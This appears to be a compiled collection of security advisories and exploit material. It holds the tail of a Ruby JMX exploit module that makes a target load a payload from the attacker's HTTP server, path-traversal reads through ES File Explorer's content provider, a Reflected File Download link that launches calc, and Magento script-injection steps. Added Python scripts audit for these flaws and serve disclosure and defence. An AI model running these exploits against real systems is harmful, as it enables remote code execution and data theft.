
    mbean_server
  end

  # RMIServer.newClient(): succeeds without credentials only if authentication is off
  def handshake(mbean)
    vprint_status("#{peer} - Sending handshake / authentication...")

    send_call(call_data: handshake_stream(mbean[:id].chop))
    return_data = recv_return

    if return_data.nil?
      vprint_error("#{peer} - Failed to send handshake")
      return nil
    end

    answer = extract_object(return_data, 1)

    if answer.nil?
      vprint_error("#{peer} - Unexpected handshake answer")
      return nil
    end

    case answer
    when 'java.lang.SecurityException'
      vprint_error("#{peer} - JMX end point requires authentication, but it failed")
      return nil
    when 'javax.management.remote.rmi.RMIConnectionImpl_Stub'
      vprint_good("#{peer} - Handshake completed, proceeding...")
      conn_stub = extract_unicast_ref(StringIO.new(return_data.contents[2].contents))
    else
      vprint_error("#{peer} - Handshake returned unexpected object #{answer}")
      return nil
    end

    conn_stub
  end

  def load_payload(conn_stub)
    vprint_status("#{peer} - Getting JMXPayload instance...")
    get_payload_instance = get_object_instance_stream(obj_id: conn_stub[:id].chop , name: "#{@mlet}:name=jmxpayload,id=1")
    send_call(call_data: get_payload_instance)
    return_data = recv_return

    if return_data.nil?
      vprint_error("#{peer} - The request to getObjectInstance failed")
      return false
    end

    answer = extract_object(return_data, 1)

    if answer.nil?
      vprint_error("#{peer} - Unexpected getObjectInstance answer")
      return false
    end

    case answer
    when 'javax.management.InstanceNotFoundException'
      vprint_warning("#{peer} - JMXPayload instance not found, trying to load")
      return load_payload_from_url(conn_stub)
    when 'javax.management.ObjectInstance'
      vprint_good("#{peer} - JMXPayload instance found, using it")
      return true
    else
      vprint_error("#{peer} - getObjectInstance returned unexpected object #{answer}")
      return false
    end
  end

  # Creates an MLet MBean and points its getMBeansFromURL at our HTTP server
  def load_payload_from_url(conn_stub)
    vprint_status("Starting service...")
    start_service

    vprint_status("#{peer} - Creating javax.management.loading.MLet MBean...")
    create_mbean = create_mbean_stream(obj_id: conn_stub[:id].chop, name: 'javax.management.loading.MLet')
    send_call(call_data: create_mbean)
    return_data = recv_return

    if return_data.nil?
      vprint_error("#{peer} - The request to createMBean failed")
      return false
    end

    answer = extract_object(return_data, 1)

    if answer.nil?
      vprint_error("#{peer} - Unexpected createMBean answer")
      return false
    end

    case answer
    when 'javax.management.InstanceAlreadyExistsException'
      vprint_good("#{peer} - javax.management.loading.MLet already exists")
    when 'javax.management.ObjectInstance'
      vprint_good("#{peer} - javax.management.loading.MLet created")
    when 'java.lang.SecurityException'
      vprint_error("#{peer} - The provided user hasn't enough privileges")
      return false
    else
      vprint_error("#{peer} - createMBean returned unexpected object #{answer}")
      return false
    end

    vprint_status("#{peer} - Getting javax.management.loading.MLet instance...")
    get_mlet_instance = get_object_instance_stream(obj_id: conn_stub[:id].chop , name: 'DefaultDomain:type=MLet')
    send_call(call_data: get_mlet_instance)
    return_data = recv_return

    if return_data.nil?
      vprint_error("#{peer} - The request to getObjectInstance failed")
      return false
    end

    answer = extract_object(return_data, 1)

    if answer.nil?
      vprint_error("#{peer} - Unexpected getObjectInstance answer")
      return false
    end

    case answer
    when 'javax.management.InstanceAlreadyExistsException'
      vprint_good("#{peer} - javax.management.loading.MLet already found")
    when 'javax.management.ObjectInstance'
      vprint_good("#{peer} - javax.management.loading.MLet instance created")
    else
      vprint_error("#{peer} - getObjectInstance returned unexpected object #{answer}")
      return false
    end

    vprint_status("#{peer} - Loading MBean Payload with javax.management.loading.MLet#getMBeansFromURL...")
    invoke_mlet_get_mbean_from_url = invoke_stream(
      obj_id: conn_stub[:id].chop,
      object: 'DefaultDomain:type=MLet',
      method: 'getMBeansFromURL',
      args: { 'java.lang.String' => "#{get_uri}/mlet" }
    )
    send_call(call_data: invoke_mlet_get_mbean_from_url)
    return_data = recv_return

    vprint_status("Stopping service...")
    stop_service

    if return_data.nil?
      vprint_error("#{peer} - The call to getMBeansFromURL failed")
      return false
    end

    answer = extract_object(return_data, 3)

    if answer.nil?
      vprint_error("#{peer} - Unexpected getMBeansFromURL answer")
      return false
    end

    case answer
    when 'javax.management.InstanceAlreadyExistsException'
      vprint_good("#{peer} - The remote payload was already loaded... okey, using it!")
      return true
    when 'javax.management.ObjectInstance'
      vprint_good("#{peer} - The remote payload has been loaded!")
      return true
    else
      vprint_error("#{peer} - getMBeansFromURL returned unexpected object #{answer}")
      return false
    end
  end
end
```

Source
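The module's description names the configuration it needs: remote JMX with `com.sun.management.jmxremote.authenticate=false`. The following audit, an added example that is not part of the Metasploit module or the original post, parses a JVM command line (as seen in `ps` output) for the standard `com.sun.management.jmxremote.*` system properties and reports the exposed cases; the command lines at the bottom are constructed.

```python
"""Audit a JVM command line for the remote-JMX settings the module above relies on."""
import shlex
from dataclasses import dataclass, field
from typing import Dict, List, Optional

PREFIX = "com.sun.management.jmxremote"


@dataclass
class JmxAudit:
    remote_enabled: bool = False
    port: Optional[int] = None
    authenticate: bool = True   # JDK default once the remote agent is enabled
    ssl: bool = True            # JDK default once the remote agent is enabled
    findings: List[str] = field(default_factory=list)


def parse_jmx_properties(cmdline: str) -> Dict[str, str]:
    """Collect the -D system properties under the jmxremote prefix."""
    props: Dict[str, str] = {}
    for token in shlex.split(cmdline):
        if not token.startswith("-D"):
            continue
        key, _, value = token[2:].partition("=")
        if key.startswith(PREFIX):
            props[key] = value
    return props


def audit_jvm_cmdline(cmdline: str) -> JmxAudit:
    """Report whether the JVM exposes JMX over RMI and how it is protected."""
    props = parse_jmx_properties(cmdline)
    audit = JmxAudit()
    port = props.get(PREFIX + ".port")
    if port is None:
        # No port means no RMI registry: the agent is only reachable locally.
        return audit
    audit.remote_enabled = True
    audit.port = int(port)
    # Both settings default to "true"; only an explicit "false" disables them.
    audit.authenticate = props.get(PREFIX + ".authenticate", "true").lower() != "false"
    audit.ssl = props.get(PREFIX + ".ssl", "true").lower() != "false"
    if not audit.authenticate:
        audit.findings.append(
            "CRITICAL: remote JMX on port %d with authenticate=false; any client that "
            "reaches the registry can create an MLet MBean and load classes from a URL"
            % audit.port)
    if not audit.ssl:
        audit.findings.append(
            "WARNING: remote JMX on port %d without SSL; credentials and serialized "
            "calls cross the network unencrypted" % audit.port)
    return audit


# Constructed samples: the exposed configuration the module checks for, a hardened
# one, and a JVM whose agent is not reachable over the network at all.
VULNERABLE_CMDLINE = (
    "java -Dcom.sun.management.jmxremote -Dcom.sun.management.jmxremote.port=1617 "
    "-Dcom.sun.management.jmxremote.authenticate=false "
    "-Dcom.sun.management.jmxremote.ssl=false -jar app.jar")
HARDENED_CMDLINE = (
    "java -Dcom.sun.management.jmxremote.port=1617 "
    "-Dcom.sun.management.jmxremote.authenticate=true "
    "-Dcom.sun.management.jmxremote.ssl=true "
    "-Dcom.sun.management.jmxremote.password.file=/etc/jmx/jmxremote.password -jar app.jar")
LOCAL_ONLY_CMDLINE = "java -Dcom.sun.management.jmxremote -jar app.jar"

if __name__ == "__main__":
    for line in (VULNERABLE_CMDLINE, HARDENED_CMDLINE, LOCAL_ONLY_CMDLINE):
        result = audit_jvm_cmdline(line)
        print(result.port, result.findings or ["ok"])
```

A command line that passes this audit can still match the module's second case (authentication enabled but a weak access policy), which has to be checked in the access file and security manager rather than on the command line.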
9. Document Title:
===============
ES File Explorer v3.2.4.1 - Path Traversal Vulnerability

References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1435

CVE-ID:
=======
CVE-2015-1876

Release Date:
=============
2015-02-17

Vulnerability Laboratory ID (VL-ID):
====================================
1435

Common Vulnerability Scoring System:
====================================
7.8

Product & Service Introduction:
===============================
ES File Explorer is a free all-in-one including a file manager & application & tasks, support for online storage spaces (Dropbox, Google Drive, SkyDrive, Box.net, Sugarsync, Yandex, Amazon S3), FTP & Samba client to explore the images, music, videos, documents and other files from your phone and your computer. It allows Android users around the world to manage their resources for free; you can see the files on your phone, access from anywhere and share them with others; it allows you to easily manage your photos or watch videos, stay connected on 3G, EDGE or WiFi, and share with friends.

(Copy of the Vendor Homepage: https://play.google.com/store/apps/details?id=com.estrongs.android.pop )

Abstract Advisory Information:
==============================
An independent vulnerability laboratory researcher discovered a path traversal web vulnerability in the official ES File Explorer v3.2.4.1 mobile android web-application.
Vulnerability Disclosure Timeline:
==================================
2015-02-17: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Affected Product(s):
====================
ES APP GROUP
Product: ES File Explorer - Mobile Web Application (Android) 3.2.4.1

Exploitation Technique:
=======================
Remote

Severity Level:
===============
High

Technical Details & Description:
================================
A path traversal web vulnerability has been discovered in the official ES File Explorer v3.2.4.1 mobile android web-application. The security vulnerability allows a remote attacker to make unauthorized requests for local files and device system paths to compromise the application or device.

The vulnerability is located in the `content://com.estrongs.files/system/` path request with the <file> context. The vulnerability can be exploited by local or remote attackers without user interaction. The attacker needs to replace the sdcard path request in the com.estrongs.files/system with a malicious path request like ./etc/passwd ./etc/hosts and continue the request. The attack vector is located on the application-side of the service and the request is http.

The security risk of the path traversal web vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 7.8. Exploitation of the directory traversal web vulnerability requires no privileged application user account or user interaction. Successful exploitation of the vulnerability results in mobile application compromise.

Request Method(s):
[+] POST & Sync

Vulnerable Module(s):
[+] content://com.estrongs.files/

Vulnerable Parameter(s):
[+] path

Affected Module(s):
[+] content://com.estrongs.files/system/

Proof of Concept (PoC):
=======================
The arbitrary code execution vulnerability can be exploited by remote attackers without user interaction or privileged application user account.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.

--- PoC Session Logs ---
Package: com.estrongs.android.pop
Application Label: ES File Explorer
Process Name: com.estrongs.android.pop
Version: 3.2.4.1
Data Directory: /data/data/com.estrongs.android.pop
APK Path: /data/app/com.estrongs.android.pop-2.apk
UID: 10235
GID: [3003, 3002, 3001, 1015, 1028]
Permissions:
- android.permission.WRITE_SETTINGS
- android.permission.CHANGE_WIFI_STATE
- android.permission.CHANGE_NETWORK_STATE
- android.permission.INTERNET
- android.permission.SET_WALLPAPER
- android.permission.ACCESS_NETWORK_STATE
- android.permission.ACCESS_WIFI_STATE
- com.android.launcher.permission.INSTALL_SHORTCUT
- com.android.launcher.permission.UNINSTALL_SHORTCUT
- android.permission.BLUETOOTH
- android.permission.BLUETOOTH_ADMIN
- android.permission.WRITE_EXTERNAL_STORAGE
- android.permission.WRITE_MEDIA_STORAGE
- android.permission.WAKE_LOCK
- android.permission.READ_PHONE_STATE
- android.permission.ACCESS_SUPERUSER
- android.permission.VIBRATE
- .PERMISSION
- android.permission.CHANGE_WIFI_MULTICAST_STATE
- android.permission.SYSTEM_ALERT_WINDOW
- android.permission.GET_TASKS
- android.permission.READ_EXTERNAL_STORAGE
Defines Permissions:
- None

Activities:
com.estrongs.android.pop.view.FileExplorerActivity
com.estrongs.android.pop.app.compress.CompressionActivity
com.estrongs.android.pop.app.compress.CompressionProxyActivity
com.estrongs.android.pop.app.ESFileSharingActivity
com.estrongs.android.pop.app.SaveToESActivity
com.estrongs.android.pop.app.LocalFileSharingActivity
com.estrongs.android.pop.app.PopVideoPlayer
com.estrongs.android.pop.app.PopVideoPlayerProxyActivity
com.estrongs.android.pop.app.AudioPlayerProxyActivity
com.estrongs.android.pop.app.editor.PopNoteEditor
com.estrongs.android.pop.app.FileChooserActivity
com.estrongs.android.pop.app.ESContentChooserActivity
com.estrongs.android.pop.app.ESRingtoneChooserActivity
com.estrongs.android.pop.app.ESWallPaperChooserActivity
com.estrongs.android.pop.app.DownloaderActivity
com.estrongs.android.pop.app.BrowserDownloaderActivity
com.estrongs.android.pop.app.PopRemoteImageBrowser
com.estrongs.android.pop.ftp.ESFtpShortcut
com.estrongs.android.pop.app.ShowDialogActivity
com.estrongs.android.pop.app.AppCheckUpdateList
com.estrongs.android.pop.app.DefaultWindowSetting
com.estrongs.android.pop.app.DocumentExtModifyList
com.estrongs.android.pop.app.TransitActivity

Broadcast(Receiver):
com.estrongs.android.pop.app.AudioPlayerService$MediaButtonReceiver
com.baidu.share.message.ShareReceiver
com.estrongs.android.pop.EnableOEMConfig
com.estrongs.android.pop.app.InstallMonitorReceiver
com.estrongs.android.pop.app.StartServiceReceiver

Services:
com.estrongs.android.pop.bt.OBEXFtpServerService
Permission: null

Providers:
Authority: com.estrongs.files
Read Permission: null
Write Permission: null
Content Provider: com.estrongs.android.pop.app.FileContentProvider
Multiprocess Allowed: False
Grant Uri Permissions: True

read content://com.estrongs.files/system/../../../../../sdcard/<file>

Read file hosts

read content://com.estrongs.files/system/etc/hosts
127.0.0.1 localhost

Solution - Fix & Patch:
=======================
In the AndroidManifest.xml file of each application that contains a content provider, it was recommended that read and write permissions are set.

Vulnerable code:
com.estrongs.files
Read Permission: null
Write Permission: null

android:exported="true"
change "true" to "false"

When the value is "false", only components of the same application or applications with the same user ID can start the service or bind to it.
<provider android:authorities="com.estrongs.files" android:exported="true" android:grantUriPermissions="true" android:name="com.estrongs.android.pop.app.FileContentProvider"/>

Fixed code:

<provider android:authorities="com.estrongs.files" android:exported="false" android:grantUriPermissions="true" android:name="com.estrongs.android.pop.app.FileContentProvider"/>

read content://com.estrongs.files/system/etc/hosts
Permission Denial: opening provider com.estrongs.android.pop.app.FileContentProv
ider from ProcessRecord{4192d1a0 32050:com.mwr.dz:remote/u0a216} (pid=32050, uid
=10216) that is not exported from uid 10235

Security Risk:
==============
The security risk of the path traversal web vulnerability in the android app is estimated as high. (CVSS 7.8)

Credits & Authors:
==================
Hadji Samir [s-dz@hotmail.fr]

Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™

Source
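The advisory above shows two separable defects: a `<provider>` exported to every app on the device without a read or write permission, and a `system/` path that `../` segments walk out of. The following script is an added example, not from the advisory or the app: it audits manifest `<provider>` entries (the fragments wrap the vulnerable and fixed lines quoted above) and confines a `content://com.estrongs.files/...` path to the directory the provider is meant to serve; the root `/system` and the file name `hosts` are assumed for illustration.

```python
"""Audit AndroidManifest <provider> entries and confine content:// paths."""
import posixpath
import xml.etree.ElementTree as ET
from typing import List, Optional
from urllib.parse import unquote, urlsplit

ANDROID_NS = "http://schemas.android.com/apk/res/android"

# Constructed manifest fragments around the provider lines quoted in the advisory.
VULNERABLE_MANIFEST = f"""<manifest xmlns:android="{ANDROID_NS}" package="com.estrongs.android.pop">
  <application>
    <provider android:authorities="com.estrongs.files" android:exported="true"
              android:grantUriPermissions="true"
              android:name="com.estrongs.android.pop.app.FileContentProvider"/>
  </application>
</manifest>"""
FIXED_MANIFEST = VULNERABLE_MANIFEST.replace('android:exported="true"', 'android:exported="false"')


def _attr(element: ET.Element, name: str) -> Optional[str]:
    """Read an android:-namespaced attribute."""
    return element.get("{%s}%s" % (ANDROID_NS, name))


def audit_providers(manifest_xml: str) -> List[str]:
    """Flag providers that any app on the device can open without holding a permission."""
    findings = []
    for prov in ET.fromstring(manifest_xml).iter("provider"):
        # Older API levels export providers by default, so a missing attribute
        # is treated as exported rather than assumed safe.
        exported = (_attr(prov, "exported") or "true").lower() == "true"
        protected = any(_attr(prov, n) for n in ("permission", "readPermission", "writePermission"))
        if exported and not protected:
            findings.append("%s: exported without read/write permission (%s)"
                            % (_attr(prov, "authorities"), _attr(prov, "name")))
    return findings


def resolve_content_path(uri: str, root: str = "/system") -> Optional[str]:
    """Map a content://com.estrongs.files/... URI to a file path, or None if it leaves root."""
    parts = urlsplit(uri)
    if parts.scheme != "content" or parts.netloc != "com.estrongs.files":
        return None
    # Decode before normalising so %2e%2e cannot slip past the ".." collapse.
    resolved = posixpath.normpath(unquote(parts.path))
    if resolved != root and not resolved.startswith(root.rstrip("/") + "/"):
        return None   # /system/../../../../../sdcard/hosts normalises to /sdcard/hosts
    return resolved


if __name__ == "__main__":
    print(audit_providers(VULNERABLE_MANIFEST))   # one finding
    print(audit_providers(FIXED_MANIFEST))        # []
    print(resolve_content_path("content://com.estrongs.files/system/../../../../../sdcard/hosts"))
    print(resolve_content_path("content://com.estrongs.files/system/etc/hosts"))
```

Setting `android:exported="false"` is the fix the advisory gives; the path check is the second layer that would have limited the damage even with the provider exported.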
10. Oren Hafif reported a new kind of attack called Reflected File Download (https://www.blackhat.com/eu-14/briefings.html#reflected-file-download-a-new-web-attack-vector) at the Black Hat Europe 2014 conference. More details about the attack can be found in his public presentation: https://www.blackhat.com/docs/eu-14/materials/eu-14-Hafif-Reflected-File-Download-A-New-Web-Attack-Vector.pdf.

Google and Bing have already fixed the vulnerability but I've found the same vulnerability in the AOL Search website. A malicious user could send the link below to a victim, who would download a malicious batch file from the autocomplete.search.aol.com domain. In the link below we have searched for 'iramar "||calc||' using the AOL autocomplete domain. The browser will encode the double quotes but the server will escape them (\") and return them inside the JSON in the response body. Since the response has the header "Content-Type: application/x-suggestions+json;charset=UTF-8" the browser will automatically try to download the reflected file. Chrome didn't try to download the file but Internet Explorer and Firefox will.

http://autocomplete.search.aol.com/autocomplete/get;calc.bat?q=iramar"||calc||&it=ws-landing&dict=en_us_search&count=8&output=json

REQUEST

GET http://autocomplete.search.aol.com/autocomplete/get;calc.bat?q=iramar%22||calc||&it=ws-landing&dict=en_us_search&count=8&output=json HTTP/1.1
Host: autocomplete.search.aol.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: ...
Connection: keep-alive

RESPONSE

HTTP/1.1 200 OK
Date: Tue, 21 Oct 2014 10:30:34 GMT
Server: Apache-Coyote/1.1
Content-Type: application/x-suggestions+json;charset=UTF-8
Content-Language: en-US
Content-Length: 24
Keep-Alive: timeout=5, max=10
Connection: Keep-Alive

["iramar\"||calc||", []]

Source
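Items 6 and 10 both turn on the same three conditions: the URL controls the download's filename (here via the `;calc.bat` path parameter the server ignores), user input is reflected into the body with shell operators intact, and the response is served as a download without a server-chosen filename. The checker below is an added example, not from the report or from Hafif's paper; it evaluates those conditions on the request and response quoted above (reconstructed here without the cookie) and shows the header changes that close the hole.

```python
"""Check a request/response pair for the Reflected File Download conditions."""
import json
import re
from typing import Dict, List, Optional, Tuple
from urllib.parse import parse_qs, urlsplit

# Extensions the OS will execute once the download lands on disk.
EXECUTABLE_EXT = (".bat", ".cmd", ".exe", ".com", ".vbs", ".hta", ".ps1", ".sh")
# Operators that let reflected text run as a command inside a .bat/.cmd file.
SHELL_OPERATORS = re.compile(r"\|\||&&|[|&]")

# Reconstructed from the exchange quoted in the post (cookie omitted).
SAMPLE_URL = ("http://autocomplete.search.aol.com/autocomplete/get;calc.bat"
              "?q=iramar%22||calc||&it=ws-landing&dict=en_us_search&count=8&output=json")
SAMPLE_HEADERS = {
    "Content-Type": "application/x-suggestions+json;charset=UTF-8",
    "Content-Language": "en-US",
    "Content-Length": "24",
}
SAMPLE_BODY = '["iramar\\"||calc||", []]'


def attacker_named_file(url: str) -> Optional[str]:
    """Executable filename smuggled into the last path segment, if any.

    The servlet container treats ';calc.bat' as a path parameter and ignores it,
    while the browser names the download after that same last segment.
    """
    last_segment = urlsplit(url).path.rsplit("/", 1)[-1]
    for piece in last_segment.split(";"):
        if piece.lower().endswith(EXECUTABLE_EXT):
            return piece
    return None


def reflected_values(url: str, body: str) -> List[Tuple[str, str]]:
    """Query values echoed into the body, verbatim or after JSON string escaping."""
    hits = []
    for key, values in parse_qs(urlsplit(url).query).items():
        for value in values:
            escaped = json.dumps(value)[1:-1]   # 'a"b' -> 'a\"b', as in the AOL body
            if value in body or escaped in body:
                hits.append((key, value))
    return hits


def rfd_findings(url: str, headers: Dict[str, str], body: str) -> List[str]:
    """Each finding is '<kind>: <detail>'; kinds filename/reflection/download make an RFD."""
    h = {k.lower(): v for k, v in headers.items()}
    findings = []
    name = attacker_named_file(url)
    if name:
        findings.append("filename: URL supplies executable name %r" % name)
    for key, value in reflected_values(url, body):
        if SHELL_OPERATORS.search(value):
            findings.append("reflection: parameter %r echoed with shell operators" % key)
    ctype = h.get("content-type", "")
    if not ctype.startswith("text/html") and "filename=" not in h.get("content-disposition", ""):
        findings.append("download: %s served without a fixed attachment filename"
                        % (ctype or "no content-type"))
    if h.get("x-content-type-options", "").lower() != "nosniff":
        findings.append("sniffing: X-Content-Type-Options: nosniff missing")
    return findings


def is_rfd_prone(url: str, headers: Dict[str, str], body: str) -> bool:
    kinds = {f.split(":", 1)[0] for f in rfd_findings(url, headers, body)}
    return {"filename", "reflection", "download"} <= kinds


def harden_headers(headers: Dict[str, str]) -> Dict[str, str]:
    """Give the response a server-chosen filename and forbid MIME sniffing."""
    hardened = dict(headers)
    hardened["Content-Disposition"] = 'attachment; filename="suggestions.json"'
    hardened["X-Content-Type-Options"] = "nosniff"
    return hardened


if __name__ == "__main__":
    for line in rfd_findings(SAMPLE_URL, SAMPLE_HEADERS, SAMPLE_BODY):
        print(line)
    print("prone:", is_rfd_prone(SAMPLE_URL, SAMPLE_HEADERS, SAMPLE_BODY))
    print("after hardening:", is_rfd_prone(SAMPLE_URL, harden_headers(SAMPLE_HEADERS), SAMPLE_BODY))
```

Rejecting path parameters on the endpoint (so `get;calc.bat` is not routed at all) removes the filename condition on the server side as well; the header fix alone is what the checker models.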
11. Document Title:
===============
Ebay Inc Magento Bug Bounty #5 - Persistent Validation & Mail Encoding Web Vulnerability

References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1226

eBay Inc. Bug Bounty Program ID: EIBBP-27288

Vulnerability Magazine: http://magazine.vulnerability-db.com/?q=articles/2015/02/14/ebay-inc-magento-2015q1-official-bug-bounty-program-rewards-security-researcher

Release Date:
=============
2015-02-14

Vulnerability Laboratory ID (VL-ID):
====================================
1226

Common Vulnerability Scoring System:
====================================
3.8

Product & Service Introduction:
===============================
Magento is an open source e-commerce web application that was launched on March 31, 2008 under the name Bento. It was developed by Varien (now Magento, a division of eBay) with help from the programmers within the open source community but is now owned solely by eBay Inc. Magento was built using parts of the Zend Framework. It uses the entity-attribute-value (EAV) database model to store data. In November 2013, W3Techs estimated that Magento was used by 0.9% of all websites.

Our team of security professionals works hard to keep Magento customer information secure. What's equally important to protecting this data? Our security researchers and user community. If you find a site that isn't following our policies, or a vulnerability inside our system, please tell us right away.

( Copy of the Vendor Homepage: http://magento.com/security & http://magento.com/security )

Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered an application-side input validation and mail encoding web vulnerability in the official eBay Magento and Magento info web-application.
Vulnerability Disclosure Timeline:
==================================
2014-03-14: Researcher Notification & Coordination (Benjamin Kunz Mejri - Evolution Security GmbH)
2014-03-15: Vendor Notification (eBay Inc Security Team - Bug Bounty Program)
2014-03-10: Vendor Response/Feedback (eBay Inc Security Team - Bug Bounty Program)
2015-02-12: Vendor Fix/Patch (Magento Developer Team)
2015-02-13: Bug Bounty Reward (eBay Inc Security Team - Bug Bounty Program)
2015-02-14: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Affected Product(s):
====================
Ebay Inc.
Product: Magento - Web Application Service 2014 Q1

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium

Technical Details & Description:
================================
An application-side mail encoding web vulnerability has been discovered in the official eBay Magento & Info Web-Application. The vulnerability allows remote attackers to bypass the outgoing mail filter validation of the magento web-server & web-application.

The vulnerability is located in the first- and lastname values of the `Talk to a Specialist` module. Remote attackers without privileged application user account are able to inject persistent malicious script codes. The script code execution occurs in the notification mail to the specialist but also to the active user copy mail. The persistent injected script code executes in the header section where the database context of the first- and lastname will be displayed. The sender interacts automatically by usage of the magento.com & info.magento.com service. The validation of the db stored outgoing values is wrongly encoded and allows persistent injections of malicious script codes via POST method. The attack vector is persistent and the injection request method is POST.
The security risk of the mail encoding web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.8. Exploitation of the web vulnerability requires no privileged web-application user account and low or medium user interaction because of the persistent attack vector. Successful exploitation of the encoding vulnerability results in session hijacking, persistent phishing, persistent external redirects and persistent manipulation of web header or mail body context.

Vulnerable Domain(s):
[+] magento.com & info.magento.com

Vulnerable Module(s):
[+] Talk to a Specialist

Vulnerable Parameter(s):
[+] firstname
[+] lastname
[+] companyname

Affected Sender(s):
[+] info@magento.com

Affected Receiver(s):
[+] bkm@evolution-sec.com

Affected Context Module(s):
[+] Section 1 > mktEditable

Proof of Concept (PoC):
=======================
The application-side input validation web vulnerability can be exploited by remote attackers without privileged user account and with low or medium user interaction. For security demonstration or to reproduce the mail encoding web vulnerability follow the provided information and steps below to continue.

Manual steps to reproduce the vulnerability ...
1. You do not need to register an account
2. Open up the main website and switch to the magento.com contacts site
3. On the bottom you need to click the `talk to specialist` button
4. You get redirected to a regular valid form with a mod specialist notification
5. Inject your script code payloads as first-, last- and companyname values
6. Click the send request button ...
Note: Now, you will be redirected by the service after choosing a specialist ... we used `E.C. Kraus` (#sry
7. Send the same request from the input below to the specialist with a non malicious test payload
8. The persistent code execution occurs in the mail to the manager aka specialist but also to the sender of the notification itself (without user auth!)
9. Successful reproduce of the persistent script code injection web vulnerability via POST method request

PoC: Your E.C. Kraus Magento Enterprise Case Study Download

<html><head>
<title>Your E.C. Kraus Magento Enterprise Case Study Download</title>
<link rel="important stylesheet" href="chrome://messagebody/skin/messageBody.css">
</head>
<body>
<table class="header-part1" border="0" cellpadding="0" cellspacing="0" width="100%">
<tbody><tr><td><b>Betreff: </b>Your E.C. Kraus Magento Enterprise Case Study Download</td></tr><tr><td>
<b>Von: </b>Magento <info@magento.com></td></tr><tr><td><b>Datum: </b>15.03.2014 20:27</td></tr></tbody></table>
<table class="header-part2" border="0" cellpadding="0" cellspacing="0" width="100%"><tbody><tr><td><b>An: </b>bkm@evolution-sec.com</td></tr></tbody></table><br>
<meta http-equiv="Content-Type" content="text/html; ">
<title></title>
<div id="Section 1" class="mktEditable"><p>Dear a "><[PERSISTENT INJECTED SCRIPT CODE 1!]">%20<[PERSISTENT INJECTED SCRIPT CODE 2!]>,</p>
<p>Thank you for requesting the Magento Enterprise Case Study on E.C. Kraus.
You can download the Case Study here:</p>
<p><a href= "http://email.magento.com/397EXO8770000EP01aGC801" >Download</a></p>
<p>Check out our complete list of <a href= "http://email.magento.com/397EXO8770000EQ01aGC801" >Magento Case Studies</a></p>
<p>To learn more about Magento Enterprise or to reqeust a personalized quote, please <a href= "http://email.magento.com/397EXO8770000ER01aGC801" >contact out Magento Enterprise team</a>.</p>
<p>Thank you,</p>
<p>The Magento Team</p></div>
<IMG SRC="http://email.magento.com/trk?t=1&mid=Mzk3LUVYTy04Nzc6MDozMzkyOjExMzI1OjA6MzMxNzo3OjE3MzIzNDI4LTE6bnVsbA%3D%3D" WIDTH="1" HEIGHT="1" BORDER="0" ALT="" />
</body>
</html>
</body>
</html>
</iframe></p></div></body></html>

--- PoC Session Logs [POST] ---
21:15:18.356[654ms][total 2913ms] Status: 200[OK]
GET http://magento.com/explore/contact-sales
Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[-1] Mime Type[text/html]
Request Header:
Host[magento.com]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://magento.com/customers/customer-showcase]
